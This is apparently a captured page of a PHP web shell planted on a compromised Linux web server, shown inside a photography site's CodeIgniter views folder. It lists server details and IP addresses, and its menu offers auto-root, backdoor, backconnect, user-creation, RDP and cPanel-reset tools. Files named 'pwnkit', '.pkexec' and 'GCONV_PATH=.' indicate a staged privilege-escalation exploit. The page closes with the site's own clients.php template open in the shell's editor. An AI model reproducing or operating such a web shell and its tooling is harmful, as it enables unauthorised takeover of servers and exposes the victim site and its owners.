Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.23.103.203
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
dos /
application /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
common
[ DIR ]
drwxr-xr-x
errors
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
album-page.php
2.33
KB
-rw-r--r--
album.php
3.1
KB
-rw-r--r--
awards.php
1.39
KB
-rw-r--r--
cinematography.php
1.61
KB
-rw-r--r--
clients.php
1.4
KB
-rw-r--r--
contact.php
7.9
KB
-rw-r--r--
index.html
131
B
-rw-r--r--
index.php
8.04
KB
-rw-r--r--
login.php
7.5
KB
-rw-r--r--
photography.php
3.72
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : clients.php
<div class="page-header "> <div class="page-header-content othors"> <div class="container"> <h2 class="heading"> Our clientele <?php if ($this->session->userdata('loggedIn')): ?> <button type="button" data-toggle="modal" href="#addClientsModal" class="btn btn-outline-dark btn-lg" style="margin-bottom: 12px;"> <i class="fa-solid fa-plus"></i> </button> <?php endif; ?> </h2> </div> </div> </div> <section class="thatform bg-white about-contact position-relative pt-5 pb-5"> <div class="container"> <div class="partners__grid-wrapper"> <?php foreach ($this->crud->getDataAll('clients', 'id', 'DESC') as $client): ?> <div class="partners__grid-item text-center p-2" <?php if ($this->session->userdata('loggedIn')){echo 'style="position:relative;"';} ?>> <?php if ($this->session->userdata('loggedIn')): ?> <div class="btn-group" style="position:absolute;top:10px;right:10px;"> <button type="button" onclick="dc('<?=base_url('admin/deleteClient/'.hashed($client->id).'.php') ?>')" class="btn btn-danger btn-sm"><i class="fa-solid fa-trash"></i></button> </div> <?php endif; ?> <img class="partners__grid-image" src="<?=base_url($client->uri)?>" alt="Client"> </div> <?php endforeach; ?> </div> </div> </section>
Close